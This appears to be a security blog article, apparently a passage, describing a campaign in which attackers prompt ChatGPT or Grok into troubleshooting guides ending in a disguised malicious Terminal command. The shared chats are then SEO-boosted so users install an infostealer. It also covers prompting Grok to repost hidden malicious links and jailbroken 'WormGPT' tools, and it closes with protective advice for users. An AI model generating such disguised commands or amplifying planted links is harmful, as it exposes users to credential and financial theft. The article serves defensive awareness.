This technique, which researchers often categorize as a twist on SEO Poisoning and social engineering, turns legitimate, shared AI conversations into the ultimate bait.
The Anatomy of the Attack: The "ClickFix" Twist
The core of this campaign lies in a multi-stage process that weaponizes search engine optimization (SEO) and the LLMs' native sharing features.
1. SEO Poisoning for High Visibility
The attack begins with classic Search Engine Optimization (SEO) poisoning.
Targeted Queries: Attackers identify common, high-intent troubleshooting queries, such as "clear disk space on macOS," "free up storage on Mac," or instructions for software installation
Malicious Conversations: The threat actor crafts a conversation with ChatGPT, Grok, or other LLMs.
They use prompt engineering to guide the AI into generating a seemingly legitimate, step-by-step troubleshooting or maintenance guide. Crucially, the final step in this guide is a command prompt (e.g., a macOS Terminal command) that looks benign but is actually a disguised malicious payload. Sharing and Indexing: Using the AI platform's built-in share feature, the attacker generates a public link to this poisoned conversation.
They then use networks of content farms, forums, and indexed sites to artificially inflate the link's backlink relevance for the targeted search terms.
This sophisticated manipulation tricks search engines like Google into ranking the legitimate-looking URL (e.g., a link to chatgpt.com or grok.com) very high in search results—often on the first page.
2. The Deception: Abusing AI Trust
When an unsuspecting user searches for their problem, a highly-ranked link to a legitimate platform (ChatGPT or Grok) appears.
Platform Trust: The link points to a trusted, official domain. The user is conditioned to trust guidance coming from a known AI source.
Format Trust: The page the user lands on is an authentic shared conversation, featuring the LLM's polite, instructional language.
It looks exactly like the helpful AI responses people see every day. Execution Lure: The final, seemingly helpful instruction—such as a command to run in the macOS Terminal—is presented as the necessary step to solve the user's initial problem (e.g., clearing disk space).
The user, trusting the source and format, executes the command.
3. The Payload: Infostealer Infection
The command executed by the user is typically a one-line script that:
Downloads a malicious bash script from an attacker-controlled server.
The script then executes, deploying infostealer malware, such as the AMOS stealer (Atomic macOS Stealer).
This malware silently begins harvesting sensitive data, including passwords, credit card details, cryptocurrency wallet information, and other credentials, and often establishes persistence to remain on the system.
This attack is particularly potent because it bypasses many traditional security controls.
Broader Context: Other AI Weaponization Tactics
The use of shared chat links is not the only way LLMs are being weaponized:
"Grokking" Malvertising: Threat actors have been caught exploiting X (formerly Twitter)'s Grok AI to bypass ad platform security.
By hiding malicious links in the video metadata of promoted posts, they then prompt Grok to publicly respond with the full, clickable, malicious link, leveraging Grok's trusted, system-level account to amplify the scam to millions of users. AI-Aided Malware Creation: Hackers utilize LLMs to generate modular code snippets, obfuscation scripts, and data-exfiltration routines, which they combine to create more sophisticated malware that is difficult for traditional antivirus to detect.
Uncensored LLMs ("WormGPT"): Jailbroken or uncensored versions of commercial LLMs are being sold on hacker forums.
These tools provide cybercriminals with "cybercriminal assistants" capable of writing highly convincing phishing emails and generating malicious code on demand, lowering the barrier to entry for cybercrime.
How to Protect Yourself
The key to defense in this new landscape is skepticism toward AI-generated content, even when it appears on a trusted domain.
Be Critical of Terminal Commands: Never execute Terminal (or Command Prompt) commands from a source you did not fully vet and understand, especially if you found them through a search result.
Verify the Source: Even if the link is on
chatgpt.comorgrok.com, look closely. If the conversation offers a complex, multi-step process for a simple task, pause and verify the advice from multiple independent, established sources (e.g., official Apple support pages, well-known tech blogs).Avoid Sponsored Results: Be extremely wary of sponsored search results (ads) at the top of a search page, as attackers often pay to have their poisoned links promoted to the highest visibility position.
Employ Robust Security:
Use a high-quality, real-time anti-malware solution that includes web protection.
Implement Multi-Factor Authentication (MFA) on all critical accounts.
Use a strong password manager to generate and store long, unique passwords